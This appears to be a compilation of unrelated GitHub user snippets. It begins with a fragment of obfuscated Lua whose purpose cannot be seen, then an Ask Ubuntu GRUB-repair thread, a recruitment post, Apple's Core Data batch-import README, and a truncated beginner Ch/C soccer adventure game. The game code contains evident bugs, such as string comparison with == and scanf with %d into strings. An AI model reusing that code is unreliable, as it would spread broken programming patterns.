fire")))]=(((#{}+2)));[((#{420;}+372717192))]=((90));[(814652122)]=((655141301));[(249927036)]=(((#{721;757;793;72;(function(...)return 660,680,197,437,...;end)(468,176)}+42)));[(257441174)]=((560241170));[(73069132)]=("\105");[((#{848;979;379;(function(...)return 5,98,686,638;end)()}+677101198))]=(((#{}+540556168)));[(975148219)]=((247135657));[(781821666)]=((248));['D129IH']=(((#{}+918225)));[(250892586)]=((575963188));}),...)})do return e end;
Aryia-Behroziuan
How do I boot my PC from GRUB? [duplicate] Asked 3 years, 4 months ago Active 2 years, 5 months ago Viewed 107k times 16 12 This question already has answers here: How can I repair grub? (How to get Ubuntu back after installing Windows?) (14 answers) Closed 2 years ago. I can no longer boot Ubuntu following a corruption problem initially reported here (How do I solve the "invalid arch dependent elf magic" error message). When I power my laptop, I now get the following message: GNU GRUB version 2.02~beta2-9ubuntu1.7 Minimal BASH-like line editing is supported. For the first word, TAB lists possible command completions. Anywhere else TAB lists possible device or file completions." and then the prompt grub> Can anyone help me get back to Ubuntu ? boot grub2 share improve this question follow edited Jul 2 '17 at 18:17 You'reAGitForNotUsingGit 13.4k99 gold badges3838 silver badges7373 bronze badges asked Jun 28 '17 at 7:49 Mons 15911 gold badge33 silver badges77 bronze badges Comments are not for extended discussion; this conversation has been moved to chat. – Thomas Ward♦ Jul 2 '17 at 19:03 Big thumbs up to everybody. I chased down a few leads and finally solved the problem by booting from a live CD and entering the command "sudo update-grub" @derHugo your help was massively useful. – Mons Jul 2 '17 at 19:29 1 The various hints given by @derHugo can be found on the chat site on Stack Exchange here: chat.stackexchange.com/rooms/61451/… and in particular when he recommended googling the question, here: "Haha sorry always forget that ^^ anyway please Google it there are tons of articles addressing this issue e.g. here is another one". Anyway, I'm absolutely made up to be up and running on my laptop again. I know I'm not supposed to say thanks, but I will all the same. THANKS ! – Mons Jul 2 '17 at 21:59 add a comment 3 Answers 35 Ok, from grub type ls (hd0,1)/ you should see a file named vmlinuz or linux, and initrd.img Type linux (hd0,1)/vmlinuz root=/dev/sda1 or linux (hd0,1)/linux root=/dev/sda1 depending on what you found with ls (hd0,1)/, then: initrd (hd0,1)/initrd.img boot If you get initramfs rescue mode enter your password, then startx. You should now have a desktop. Use gparted to check your file system, if it reports an error, then you need to boot from a LiveCD or other media to fix it .... DO NOT attempt to repair a mounted partition. The following three commands fix many grub boot problems. They run quick so just do all three instead of trying to find which one you need. sudo grub-install /dev/sda && sudo update-grub && sudo update-initramfs -u Reboot and see what you get. share improve this answer follow edited Feb 2 '18 at 5:55 answered Jul 2 '17 at 18:49 ravery 6,11955 gold badges1616 silver badges3535 bronze badges 3 Is it really innitrd or should it be initrd? – WinEunuuchs2Unix Jul 2 '17 at 19:52 1 It is actually initrd – answerSeeker Jul 2 '17 at 20:19 1 @ravery Yes I could have corrected the typo. I have a weird point of view thinking it's more polite to point out to the author and letting them make the change. That way an otherwise spotless answer doesn't have the "blemish" of an "edited by someone else" flag. I do edit new users' questions frequently though... Have another +1 :) – WinEunuuchs2Unix Jul 2 '17 at 22:18 1 IF you stuck in "INITRAMFS" not in a fully booted system you can't use startx cause there is no desktop there, what you are referring as initramfs should be multi-user.target. – Ravexina♦ Jul 5 '17 at 8:53 3 In case the files above aren't listed, try iterating on ls (hd0,1)/ command, as in: ls (hd0,2)/, ls (hd0,3)/, etc. as suggested in here. – Nae Dec 23 '18 at 17:46 show 9 more comments 1 The most probable cause to that issue is installing the OS to a disk, grub to a different disk that is not removable. Then removing the OS disk. You could just plug the USB stick back in. Problem solved. share improve this answer follow edited Jul 2 '17 at 19:17 answered Jul 2 '17 at 19:02 RobotHumans 26.2k33 gold badges6969 silver badges109109 bronze badges Solution found (see above). – Mons Jul 2 '17 at 19:29 I saw the chat conversation. Solved with update-grub, which supports not refutes this answer. – RobotHumans Jul 2 '17 at 19:32 add a comment 1 Restart your system. Press f2 key while loading. Goto boot option. Press f5/f6 to change values (which os you want to install keep it in first place.). Enter f10 key....It may solve your problem. . . . If not enter this in grub rescue mode.... ls (hd0) (hd0,msdos6) (hd0,msdos5)....(hd0,msdos1) OR (hd0) (hd0,gpt6).....(hd0,gpt1) set boot=(hd0,gpt6) OR set boot=(hd0,msdos6) set prefix=(hd0,gpt6)/boot/grub OR use msdos6 instead. insmod normal normal This may solve your problem. share improve this answer follow answered Jul 9 '17 at 8:11 Pavan Rao 1122 bronze badges these are various ways to launch grub. this is not the issue as OP states. grub launches but drops to recovery mode. The issue is that the grub config file is missing – ravery Jul 9 '17 at 8:23 add a comment Not the answer you're looking for? Browse other questions tagged boot grub2 or ask your own question.
jjm2473
No description available
JAGerMANY
I meet here all my friends and all who interested in developing this app for ex. for Android. I want in near future find good friends here to become members developers, one who knows different supplies for working, ones who only just giving new ideas. This is real project, because I have decisions how to create good base for creatin resultative soft just inside my organization. We really have problem with apps we buy and install. Those (most) apps are not working properly or done like by a donkey. What I really want - CREATE BIG BASE OF MEMBERS WHO RESULTATIVE COMMUNICABLE CLEVER A BIT AND JUST THAT WHO GIVES ADVICES CAN HELP----LISTEN:: BETTER THAN OTHER COMUNITY OF GOOD PEOPLE WHO HAVE IDEA TO MAKE AND CREATE SOMETHING INTERESTIN AND USEFULL, TIPS, TRICKS, TWEAKS, BLOGS, POSSITIVE IDEA TO MAKE BETTER WORLD, HELP OTHER, FRIENDSHIP, AND 2IN1 INCREASE YOUR LEVEL, KNOWLEDGES, BECOME CREATOR OF LIFE.! OK, all who interested in my plan, enyone who have ideas to go AsfPHOEN1X (c) healing insight way... DON'T THINK, JUST CONNECT! PS the project will in few months give some results and not only in productivity but in cash also, but it is not in prime. LET'S GO PEOPLE, FIGHTING LAZY AND TAKING PLACES- GIVE TO THIS PROJECT FEW MIN. /EVERY DAY. COMPANY ENSURE GOOD RESULTS "GARANT"!!! Glad to meet u here how about cup of coffee and decision for result. Or no any coffee break, go to plan and do this and that today, see my apps, or just be welcome, I glad to see everyone!
charlieInDen
# Loading and Displaying a Large Data Feed Consume data in the background, and lower memory usage by batching imports and preventing duplicate records in the Core Data store. ## Overview This sample app shows a list of earthquakes recorded in the United States in the past 30 days by consuming a U. S. Geological Survey (USGS) real time data feed. Press the app’s refresh button to load the USGS JSON feed on the URLSession’s default delegate queue, which is a serial operations queue running in the background. Once the feed downloads, continue working on this queue to import the large number of feed elements to the store without blocking the main queue. ## Import Data in the Background To import data in the background, you need two managed object contexts: a main queue context to provide data to the user interface, and a private queue context to perform the import on a background queue. Create a main queue context by setting up your Core Data stack using [`NSPersistentContainer`](https://developer.apple.com/documentation/coredata/nspersistentcontainer), which initializes a main queue context in its [`viewContext`](https://developer.apple.com/documentation/coredata/nspersistentcontainer/1640622-viewcontext) property. ``` swift let container = NSPersistentContainer(name: "Earthquakes") ``` Create a private queue context by calling the persistent container’s [`newBackgroundContext()`](https://developer.apple.com/documentation/coredata/nspersistentcontainer/1640581-newbackgroundcontext) method. ``` swift let taskContext = persistentContainer.newBackgroundContext() ``` When the feed download finishes, use the task context to consume the feed in the background. Wrap your work in a [`performAndWait()`](https://developer.apple.com/documentation/coredata/nsmanagedobjectcontext/1506364-performandwait) block. ``` swift // taskContext.performAndWait runs on the URLSession's delegate queue // so it won’t block the main thread. taskContext.performAndWait { ``` For more information about working with concurrency, see [`NSManagedObjectContext`](https://developer.apple.com/documentation/coredata/nsmanagedobjectcontext#1654001). ## Update the User Interface To show the imported data in the user interface, merge it from the private queue into the main queue. Set the `viewContext`’s [`automaticallyMergesChangesFromParent`](https://developer.apple.com/documentation/coredata/nsmanagedobjectcontext/1845237-automaticallymergeschangesfrompa) property to `true`. ``` swift // Merge the changes from other contexts automatically. container.viewContext.automaticallyMergesChangesFromParent = true ``` Both contexts are connected to the same [`persistentStoreCoordinator`](https://developer.apple.com/documentation/coredata/nspersistentcontainer/1640567-persistentstorecoordinator), which serves as their parent for data merging purposes. This is more efficient than merging between parent and child contexts. When the background context saves, Core Data observes the changes to the store and merges them into the `viewContext` automatically. Then [`NSFetchedResultsController`](https://developer.apple.com/documentation/coredata/nsfetchedresultscontroller) observes changes to the `viewContext`, and updates the user interface accordingly. Finally, dispatch any user interface state updates back to the main queue. ``` swift dataProvider.fetchQuakes { error in DispatchQueue.main.async { // Update the spinner and refresh button states. self.navigationItem.rightBarButtonItem?.isEnabled = true UIApplication.shared.isNetworkActivityIndicatorVisible = false self.spinner.stopAnimating() // Show an alert if there was an error. guard let error = error else { return } let alert = UIAlertController(title: "Fetch quakes error!", message: error.localizedDescription, preferredStyle: .alert) alert.addAction(UIAlertAction(title: "OK", style: .default, handler: nil)) self.present(alert, animated: true, completion: nil) } } ``` ## Work in Batches to Lower Your Memory Footprint Core Data caches the objects that are fetched or created in a context, to avoid a round trip to the store file when these objects are needed again. However, your app’s memory footprint grows as you import more and more objects. To avoid a low memory warning or termination by iOS, perform the import in batches and reset the context after each batch. Split the import into batches by dividing the total number of records by your chosen batch size. ``` swift let batchSize = 256 let count = geoJSON.quakePropertiesArray.count // Determine the total number of batches. var numBatches = count / batchSize numBatches += count % batchSize > 0 ? 1 : 0 for batchNumber in 0 ..< numBatches { // Determine the range for this batch. let batchStart = batchNumber * batchSize let batchEnd = batchStart + min(batchSize, count - batchNumber * batchSize) let range = batchStart..<batchEnd // Create a batch for this range from the decoded JSON. let quakesBatch = Array(geoJSON.quakePropertiesArray[range]) // Stop the entire import if any batch is unsuccessful. if !importOneBatch(quakesBatch, taskContext: taskContext) { return } } ``` Reset the context after importing each batch by calling [`reset()`](https://developer.apple.com/documentation/coredata/nsmanagedobjectcontext/1506807-reset). ``` swift taskContext.reset() ``` ## Prevent Duplicate Data in the Store Every time you refresh the feed, the data downloaded from the remote server contains all earthquake records for the past month, so it can have many duplicates of data you’ve already imported. To avoid creating duplicate records, you constrain an attribute, or combination of attributes, to be unique across all instances. The `code` attribute uniquely identifies an earthquake record, so constraining the `Quake` entity on `code` ensures that no two stored records have the same `code` value. Select the `Quake` entity in the data model editor. In the data model inspector, add a new constraint by clicking the + button under the Constraints list. A constraint placeholder appears. ``` comma, separated, properties ``` Double-click the placeholder to edit it. Enter the name of the attribute (or comma-separated list of attributes) to serve as unique constraints on the entity. ``` code ``` When saving a new record, the store now checks whether any record already exists with the same value for the constrained attribute. In the case of a conflict, an [`NSMergeByPropertyObjectTrump`](https://developer.apple.com/documentation/coredata/nsmergebypropertyobjecttrumpmergepolicy) policy comes into play, and the new record overwrites all fields in the existing record.
Minh2003-hype
//file name:chooseyourownadventurestory.ch //what it does: write a "Choose your own adventure" story //declaration int A; string_t name,okay,ans,yes,no,ans1,conversation,name1,roadmap,league,position; A=randint(1,2); void introduction(){ //introduction printf(" Welcome to Soccer adventure!\n"); sleep(1.75); printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); sleep(1.75); printf("Please enter your name to start a new adventure!\n"); scanf("%s",&name); sleep(1.5); printf("Hello %s, in this adventure you will be in a journey that will lead you to be the best player in the world!\n",name); sleep(2); printf("You are going to choose a character. Please type \"OK\" to continue\n"); do{ scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); } void character(){ //CharacterSelection printf("There are only 2 kinds of characters that you can choose, Tall or Short!\n"); sleep(3); if(A==1){ printf("Do you want to continue with character Tall? Please type \"yes\" or \"no\"\n"); do{ scanf("%s",&ans1); if(ans1=="yes"){ printf("Now you will use character Tall! \n"); } else if(ans1=="no"){ printf("Now you will use character Short! \n"); }else{ printf("Incorrect. Try again\n"); } }while(ans1!="yes"&& ans1!="no"); }else{ printf("Do you want to continue with character Short? Please type \"yes\" or \"no\"\n"); do{ scanf("%s",&ans1); if(ans1=="yes"){ printf("Now you will use character Short! \n"); } else if(ans1=="no") { printf("Now you will use character Tall!\n"); } else{ printf("Incorrect. Try again\n"); } }while(ans1!="yes"&& ans1!="no"); } sleep(3); printf("In progressing...\n"); sleep(3); printf("Please choose a name for your character.\n"); scanf("%s", &name1); sleep(3); } void begin(){ //BeginningOfTheStory printf("Do you want to see a \"Roadmap\"? Please type \"Yes\" or \"No\"!\n"); do{ scanf("%s",&roadmap); if(roadmap=="Yes"){ printf("Here is the \"Roadmap\"...\n"); sleep(3); printf(" League \n"); sleep(3); printf(" / | \\ \n"); printf(" / | \\ \n"); printf(" / | \\ \n"); printf(" / | \\ \n"); printf(" / | \\ \n"); sleep(3); printf(" Premier League La Liga Serie A (You will have to choose a league)\n"); printf(" (England) (Spain) (Italy)\n"); sleep(3); printf(" \\ | /\n"); printf(" \\ | /\n"); printf(" \\ | /\n"); printf(" \\ | /\n"); sleep(3); printf(" Forward / Midfield / Back (You will have to choose a position) \n"); sleep(3); printf(" |\n"); printf(" |\n"); printf(" |\n"); sleep(3); printf(" League journey\n"); sleep(3); printf(" |\n"); printf(" |\n"); printf(" |\n"); sleep(3); printf(" Champions League journey\n"); sleep(3); printf(" |\n"); printf(" |\n"); printf(" |\n"); sleep(3); printf(" World Cup journey\n"); sleep(3); printf(" |\n"); printf(" |\n"); printf(" |\n"); sleep(3); printf(" _ _ _ _ _ _ _ _ Achievements in this season_ _ _ _ _ _ _ _\n"); printf(" | | | | | | | \\ \n"); printf(" | | | | | | | \\_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \n"); printf(" | |_ | |_ | |_ | | | \n"); sleep(3); printf("1.EPL top scorer | 2.EPL top assister |3.EPL best defender |4.La Liga top scorer | |\n"); sleep(2); printf("3rd place EPL | 2nd place EPL | EPL trophy | 3rd place La Liga | |\n"); sleep(2); printf("Kopa trophy | FIFA Ballon d'Or | Champions League | win European Golden Shoe | |\n"); sleep(2); printf(" | | (winner) | | |\n"); sleep(2); printf(" 5.La Liga top assister|6.La Liga best defender|7.Serie A top scorer|8.Serie top assister|9.Serie A best defender\n"); sleep(2); printf(" La Liga trophy | 2nd place La Liga | Serie A trophy | 3rd place Serie A | 2nd place Serie A \n"); sleep(2); printf(" Champions League | World Cup winner | Champions League | World Cup winner | Kopa Trophy \n"); sleep(3); printf("Let's play\n"); sleep(3); printf("In progressing...\n"); sleep(3); }else if(roadmap=="No"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(roadmap!="Yes"&&roadmap!="No"); sleep(2); printf("The story now will begin! Type \"OK\" to start\n"); do{ scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("In correct. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Story begins...\n"); sleep(3); printf("This story is about a boy named %s that falls in love with soccer.\n",name1); sleep(3); printf("His dream is to become the best soccer player in the world.\n"); sleep(3); printf("After he played soccer in college, he is selected as one of the best player in the area!\n"); sleep(3); printf("He is invited to go and play at one of three best league in the World!\n"); sleep(3); } void LeagueSelection(){ //LeagueSelection printf("Please select one league to start the career!(a,b or c)\n"); sleep(3); printf("a.Premier League(England) b.La Liga(Spain) c.Serie A(Italy)\n"); do{ scanf("%d",&league); sleep(3); if(league=="a"){ printf("In progressing...\n"); }else if(league=="b"){ printf("In progressing...\n"); } else if(league=="c"){ printf("In progressing..,\n"); }else{ printf("Incorrect. Try again\n"); } }while(league!="a"&& league!="b"&& league!="c"); } void option1(){ //league1 if(league=="a"){ printf("*On plane to England*\n"); sleep(3); printf("He starts his tryout at Liverpool F.C\n"); sleep(3); printf("At the beginning, Jürgen Klopp(The manager) said to %s:\"This is gonna be a hard\"\n", name1); printf("tryout so just try your best to let me see what you got,okay?\"\n"); sleep(3); printf("You said: Yes coach \n"); sleep(1); printf("***The tryout is happening***\n"); printf("Please wait for the processing\n"); sleep(4); printf("After the tryout finished, %s got chosen!\n",name1); sleep(3); printf("Jürgen Klopp: \"Now you guys are the chosen\"\n"); sleep(1); printf("Jürgen Klopp: \"What position do you wanna play, %s?\"\n",name1); sleep(3); printf("Please select 1 position that your character will play(a,b or c)!\n"); sleep(2.5); printf("a.Forward b.Midfield c.Back\n"); do{ scanf("%d",&position); sleep(2); if(position=="a"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Forward~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Liverpool F.C is facing against Manchester United with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Sadio Mané at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("***At 88'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Liverpool's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Liverpool got on the 3rd place of the EPL leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Liverpool gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Liverpool only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Arsenal\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is scored by %s\n",name1); sleep(3); printf("\"Liverpool finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Juventus in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Barcelona in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... But your team lost this final round\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against England in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Portugal in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s can't beat Ronaldo to get into the semi-final round!\n",name1); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("EPL top scorer.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("3rd place EPL.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("Kopa Trophy.\n"); } else if(position=="b"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Midfield~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Liverpool F.C is facing against Manchester United with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Fabinho at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Wonderful assist from %s\n",name1); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("***At 80'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Liverpool's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Liverpool got on the 2nd place of the EPL leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Liverpool gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Liverpool only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Arsenal\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is assisted by %s\n",name1); sleep(3); printf("\"Liverpool finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Juventus in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Barcelona in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... But your team lost this final round\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against England in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Portugal in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s can't beat Ronaldo to get into the semi-final round!\n",name1); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("EPL top assister.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("2nd place EPL.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("FIFA Ballon d'Or.\n"); } else if(position=="c"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Back~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Liverpool F.C is facing against Manchester United with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Virgil van Dijk at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("What a wonderful tackle from %s\n",name1); sleep(3); printf("He just saved Liverpool from a dangerous goal\n"); sleep(3); printf("***At 88'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Liverpool's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Liverpool got on the top of the EPL leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Liverpool gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Liverpool only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Arsenal\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is scored by %s from a corner kick situation\n",name1); sleep(3); printf("\"Liverpool finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Juventus in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Barcelona in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Liverpool will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends...\n"); sleep(3); printf("~~Congratulations!! You win Champions League's cup this year~~\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out 